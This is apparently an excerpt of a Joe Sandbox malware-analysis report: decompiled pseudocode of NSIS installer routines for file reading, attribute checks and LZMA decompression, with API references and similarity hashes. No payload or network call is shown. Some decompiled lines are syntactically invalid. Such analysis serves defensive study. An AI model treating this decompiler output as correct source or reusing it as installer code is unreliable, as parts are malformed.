                                    			E00403371(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t29;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42a2b8;
					 *0x420ef4 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E00403479(4);
				if(_t22 >= 0) {
					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x420ef4 =  *0x420ef4 + 4;
						_t36 = E00403479(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x420ef4 =  *0x420ef4 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										_t29 = E004061DB( *0x40a01c, 0x414ef0, _t28); // executed
										if(_t29 == 0) {
											goto L18;
										}
										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x420ef4 =  *0x420ef4 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}















                                    0x00403375
                                    0x0040337e
                                    0x00403387
                                    0x0040338b
                                    0x00403396
                                    0x00403396
                                    0x0040339e
                                    0x004033a5
                                    0x004033b7
                                    0x004033be
                                    0x00403463
                                    0x00403463
                                    0x00000000
                                    0x004033c4
                                    0x004033c7
                                    0x004033d3
                                    0x004033d7
                                    0x00403471
                                    0x00403471
                                    0x004033dd
                                    0x004033e0
                                    0x0040343f
                                    0x00403445
                                    0x00403447
                                    0x00403447
                                    0x00403459
                                    0x00403461
                                    0x00403468
                                    0x0040346b
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x004033e2
                                    0x004033e5
                                    0x00000000
                                    0x004033eb
                                    0x004033f0
                                    0x004033f7
                                    0x004033fa
                                    0x004033fc
                                    0x004033fc
                                    0x00403409
                                    0x0040340c
                                    0x00403413
                                    0x00000000
                                    0x00000000
                                    0x0040341c
                                    0x00403423
                                    0x0040343b
                                    0x00403465
                                    0x00403465
                                    0x00403425
                                    0x00403425
                                    0x00403428
                                    0x0040342b
                                    0x00403431
                                    0x00403437
                                    0x00000000
                                    0x00403439
                                    0x00000000
                                    0x00403439
                                    0x00403437
                                    0x00000000
                                    0x00403423
                                    0x00000000
                                    0x004033f0
                                    0x004033e5
                                    0x004033e0
                                    0x004033d7
                                    0x004033be
                                    0x00403473
                                    0x00403476

                                    APIs
                                    • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: FilePointer
                                    • String ID: 248058040134
                                    • API String ID: 973152223-1212554544
                                    • Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                    • Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
                                    • Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                    • Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040603F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 746 40603f-40605a call 406668 call 405fe2 751 406060-40606d call 4068ef 746->751 752 40605c-40605e 746->752 756 40607d-406081 751->756 757 40606f-406075 751->757 753 4060b8-4060ba 752->753 759 406097-4060a0 lstrlenW 756->759 757->752 758 406077-40607b 757->758 758->752 758->756 760 4060a2-4060b6 call 405f37 GetFileAttributesW 759->760 761 406083-40608a call 40699e 759->761 760->753 766 406091-406092 call 405f83 761->766 767 40608c-40608f 761->767 766->759 767->752 767->766
                                    C-Code - Quality: 53%
                                    			E0040603F(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406668(0x425f50, _a4);
				_t21 = E00405FE2(0x425f50);
				if(_t21 != 0) {
					E004068EF(_t21);
					if(( *0x42a278 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425f50 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425f50);
							_push(0x425f50);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E0040699E();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405F83(0x425f50);
								continue;
							} else {
								goto L1;
							}
						}
						E00405F37();
						_t16 = GetFileAttributesW(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}









                                    0x0040604b
                                    0x00406056
                                    0x0040605a
                                    0x00406061
                                    0x0040606d
                                    0x0040607d
                                    0x0040607f
                                    0x00406097
                                    0x00406098
                                    0x0040609f
                                    0x004060a0
                                    0x00000000
                                    0x00000000
                                    0x00406083
                                    0x0040608a
                                    0x00406092
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0040608a
                                    0x004060a2
                                    0x004060a8
                                    0x00000000
                                    0x004060b6
                                    0x0040606f
                                    0x00406075
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00406075
                                    0x0040605c
                                    0x00000000

                                    APIs
                                      • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                      • Part of subcall function 00405FE2: CharNextW.USER32(?), ref: 00405FF0
                                      • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                      • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                    • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,7556D4C4,?,755513E0,00405D94,?,7556D4C4,755513E0,00000000), ref: 00406098
                                    • GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,7556D4C4,?,755513E0,00405D94,?,7556D4C4,755513E0), ref: 004060A8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                    • String ID: P_B
                                    • API String ID: 3248276644-906794629
                                    • Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                    • Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
                                    • Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                    • Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00407194 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 99%
                                    			E00407194() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
